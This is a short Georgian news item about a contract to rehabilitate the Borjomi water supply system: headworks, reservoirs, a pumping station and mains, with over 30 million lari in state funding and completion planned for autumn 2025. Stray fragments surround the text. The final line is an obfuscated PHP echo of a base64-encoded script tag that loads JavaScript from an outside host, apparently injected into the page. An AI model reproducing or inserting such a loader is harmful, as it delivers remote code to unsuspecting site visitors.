celsiusi
ავერსი შნაიდერი

რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს გაერთიანებული წყალმომარაგების კომპანია ქალაქ ბორჯომში წყალმომარაგების სისტემის ოპტიმიზაციისთვის საპროექტო - სამშენებლო სამუშაოებს იწყებს.

შესაბამის ხელშეკრულებას ხელი წყალმომარაგების კომპანიის დირექტორის მოადგილემ, ნინო ნაროზაშვილმა და ტენდერში გამარჯვებული კონტრაქტორი კომპანიის - ერთობლივი ამხანაგობის „ინვესტ გრუპის“ თავმჯდომარემ - გიორგი წკრიალაშვილმა მოაწერეს.

სამუშაოების ფარგლებში გათვალისწინებულია: სათავე ნაგებობების, რეზერვუარების, სატუმბი სადგურისა და მაგისტრალური მილების რეაბილიტაცია.

პროექტს სახელმწიფო ბიუჯეტის დაფინანსებით 30 მლნ. ლარზე მეტი მოხმარდება. სამუშაოების დასრულება 2025 წლის შემოდგომის სეზონზე იგეგმება. პროექტის დასრულების შემდეგ ქ. ბორჯომისა და სოფელ სადგერის ადგილობრივი მოსახლეობა წყალმომარაგების განახლებული ინფრასტრუქტურით ისარგებლებს.

327
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");